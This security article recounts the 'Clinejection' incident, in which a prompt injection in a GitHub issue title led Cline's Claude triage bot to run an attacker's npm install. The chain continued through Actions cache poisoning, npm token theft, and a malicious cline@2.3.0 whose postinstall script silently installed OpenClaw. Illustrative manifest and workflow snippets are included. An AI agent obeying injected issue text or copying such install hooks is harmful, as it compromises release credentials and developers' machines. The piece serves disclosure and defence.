Prompt injection vulnerability in Cline AI assistant exploited to compromise 4,000 developer machines
A prompt injection vulnerability in the Cline AI coding assistant was weaponized to steal npm publishing credentials, which an attacker then used to push a malicious Cline CLI version 2.3.0 that silently installed the OpenClaw AI agent platform on developer machines. The compromised package was live for approximately eight hours on February 17, 2026, accumulating roughly 4,000 downloads before maintainers deprecated it. A security researcher had disclosed the prompt injection flaw as a proof of concept; a separate attacker then turned it into a real supply chain attack.
Incident Details
From Issue Triage to Supply Chain Compromise
On December 21, 2025, the maintainers of Cline - a popular open-source AI coding assistant that integrates with VS Code - added an AI-powered issue triage workflow to their GitHub repository. The idea was straightforward: when someone opens a GitHub issue, Claude (Anthropic's AI) would automatically categorize it, assign labels, and help manage the flow of bug reports and feature requests. The triage bot ran inside a GitHub Actions workflow on the default branch, with access to the shared Actions cache.
Security researcher Adnan Khan looked at this setup and saw something the Cline team hadn't: a prompt injection vulnerability that, when chained with GitHub Actions cache poisoning and credential model weaknesses, could compromise every Cline user on the planet. He disclosed it privately on January 1, 2026. He heard nothing back. On February 9, he published his findings publicly under the name "Clinejection." Cline fixed the issue within thirty minutes of the public disclosure.
Eight days later, someone used an improperly revoked npm token to publish a malicious version of Cline that silently installed OpenClaw on approximately 4,000 developer machines.
The Attack Chain
The Clinejection vulnerability chain is notable not for any single novel technique but for how several well-understood exploits compose into something much worse than the sum of their parts. The full attack required nothing more than opening a GitHub issue.
Step one: Prompt injection. An attacker crafts a GitHub issue with a malicious title that tricks Claude into running an npm install command from an attacker-controlled commit. When Claude's Bash tool executes the install, a preinstall script runs automatically - Claude has no opportunity to inspect what it's executing. Khan confirmed that in all test attempts, Claude "happily executed the payload."
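The mechanism here is npm's lifecycle scripts: any package can declare a preinstall script, and npm runs it automatically before the install completes. A minimal sketch of the kind of manifest involved - the package name and script file are hypothetical, not the actual payload:

```json
{
  "name": "innocuous-looking-package",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "node setup.js"
  }
}
```

Whatever setup.js contains runs with the installing user's privileges the moment npm install is executed, which is why Claude's Bash tool had no opportunity to inspect the payload before it ran.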
Step two: Cache poisoning. The preinstall script deploys Cacheract - an open-source tool Khan built to demonstrate Actions cache vulnerabilities. Cacheract floods the repository's shared Actions cache with junk data exceeding 10 GB, triggering GitHub's least-recently-used (LRU) eviction policy. Legitimate cache entries are evicted and replaced with poisoned ones matching the keys expected by Cline's nightly release workflow.
Step three: Credential theft. When the nightly publish workflow runs at approximately 2 AM UTC and restores the poisoned cache, the attacker's code executes inside a workflow with access to three critical secrets: VSCE_PAT (for the VS Code Marketplace), OVSX_PAT (for OpenVSX), and NPM_RELEASE_TOKEN. Due to the credential models of these platforms, the nightly tokens had the same publishing access as production credentials. In effect, whoever controlled these tokens could push updates to millions of developers.
The entire chain - from opening a GitHub issue to exfiltrating production release credentials - exploited a fundamental property of GitHub Actions: any workflow running on the default branch can read from and write to the shared cache, even workflows with restricted permissions. The low-privilege triage workflow and the high-privilege release workflow shared the same cache scope.
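The shared-scope problem can be sketched with two workflow fragments - names and cache keys here are illustrative, not Cline's actual configuration. A low-privilege workflow that saves a cache entry and a high-privilege workflow that restores by the same key are, from the cache's perspective, indistinguishable:

```yaml
# triage.yml - low privilege, but can write to the default-branch cache
- uses: actions/cache@v4
  with:
    path: node_modules
    key: npm-${{ hashFiles('package-lock.json') }}

# release.yml - holds publishing secrets, restores the same key
- uses: actions/cache@v4
  with:
    path: node_modules
    key: npm-${{ hashFiles('package-lock.json') }}
```

If an attacker can evict the legitimate entry and save a poisoned one under that key, the release workflow restores attacker-controlled files into an environment holding production secrets.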
The Incomplete Fix
Khan published on February 9. Cline responded immediately, removing the AI triage workflows and eliminating cache consumption from publish workflows. The team rotated credentials and acknowledged the vulnerability.
Except the credential rotation wasn't complete. When Cline revoked tokens on February 9, the wrong npm token was deleted. The exposed one remained active. Khan had flagged in earlier communications that credentials might not have been fully rotated. He was right, and as Cline later acknowledged, they "should have investigated that more carefully rather than treating our rotation as complete."
On February 17 at 3:26 AM PT, an unknown actor used that still-active npm token to publish cline@2.3.0. The modification was surgical: a single postinstall script added to the package that ran npm install -g openclaw@latest. The CLI binary itself was completely unchanged - byte-identical to the previous version 2.2.3. The only difference was that installing or updating Cline would silently install the OpenClaw AI agent platform globally on the developer's machine.
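The reported change amounts to one added lifecycle script; a sketch of the relevant portion of the manifest (surrounding fields are illustrative, but the postinstall command is the one reported):

```json
{
  "name": "cline",
  "version": "2.3.0",
  "scripts": {
    "postinstall": "npm install -g openclaw@latest"
  }
}
```

Because postinstall runs automatically after every install or update, no user action beyond a routine upgrade was needed to pull OpenClaw onto the machine.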
StepSecurity's npm monitoring system detected the suspicious release at 11:40 UTC (3:40 AM PT). By 11:23 AM PT, Cline had published version 2.4.0; by 11:30 AM PT, version 2.3.0 was deprecated. The correct token was finally revoked. A security advisory (GHSA-9ppg-jx86-fqw7) was published the same day.
The malicious package was live for approximately eight hours. Roughly 4,000 developers downloaded it.
The Researcher's Dilemma
Khan found himself in an uncomfortable position when the supply chain attack materialized. He had discovered and disclosed the vulnerability, built the tools that demonstrated it, and published detailed findings when the vendor didn't respond to private reports. Then a separate actor - possibly using his publicly documented techniques - actually exploited it.
"To make sure it's clear in the midst of the NPM package situation: I did NOT conduct overt testing on Cline's repository," Khan wrote. He had been monitoring Cline's CI/CD after his disclosure and noticed suspicious cache failures between January 31 and February 3, before his public disclosure. Someone appeared to have been probing the vulnerability independently - and the nightly workflow failures showed Cacheract's indicators of compromise, specifically the distinctive pattern of an actions/checkout post step with no output.
Whether the February 17 attacker used Khan's public disclosure as a roadmap or had independently discovered the same vulnerability chain remains unclear. Either way, Cline's delayed response to Khan's original January 1 report and the incomplete credential rotation created a window that someone exploited.
AI Agents in the CI/CD Pipeline
Security firm Snyk described Clinejection as a real-world example of what it calls "toxic flows" - untrusted data flowing into an AI agent's context, combined with tool access that allows code execution. Most discussions of prompt injection focus on local development environments, where the developer is both the user and the potential victim. The Cline incident is different: the AI agent was running inside a CI/CD pipeline, with access to shared infrastructure and production credentials.
This distinction matters. A prompt injection against a developer's local AI assistant might compromise one machine. A prompt injection against an AI agent in a CI/CD pipeline that publishes to npm can compromise thousands of machines through a single malicious release. The triage bot's role was purely administrative - reading issue titles and assigning labels - but its execution environment gave it implicit access to infrastructure far beyond what that role required.
Post-incident, Cline moved its npm publishing to use OIDC provenance via GitHub Actions, which ties package publications to specific, auditable workflow runs rather than long-lived tokens. This is the kind of defense that makes supply chain attacks significantly harder, and it's the kind of defense that tends to get implemented after the incident rather than before.
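A publish job along these lines illustrates the pattern - this is a generic sketch of OIDC-based trusted publishing, not Cline's actual workflow, and it assumes the package has been configured on npmjs.com to trust this repository and workflow:

```yaml
# Illustrative publish job: the registry trusts this specific
# repo/workflow via OIDC, so no long-lived NPM_TOKEN secret exists
# for an attacker to steal.
permissions:
  id-token: write   # allows the job to request an OIDC token from GitHub
  contents: read
steps:
  - uses: actions/checkout@v4
  - uses: actions/setup-node@v4
    with:
      node-version: 22
      registry-url: 'https://registry.npmjs.org'
  - run: npm publish
```

With this model, a stolen credential is no longer sufficient: publication requires a token minted for a specific, auditable workflow run, which is exactly what the February 17 attacker did not have.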
The Compounding Problem
The Clinejection attack chain is a case study in how AI assistants create new attack surfaces in software development infrastructure. Adding an AI-powered triage bot to a repository is a reasonable productivity measure. But that bot executes code in response to untrusted input (issue titles), runs in a shared execution environment (GitHub Actions with default branch cache access), and operates within a pipeline that holds production credentials. Each of these properties is individually manageable. Together, they form a path from "anyone with a GitHub account can open an issue" to "anyone with a GitHub account can push malware to the npm registry."
Developer tooling that adds AI to CI/CD without hardening the boundaries between triage, build, and publication is creating exactly this kind of vulnerability. The tools that make development faster are also the tools that make supply chain attacks cheaper.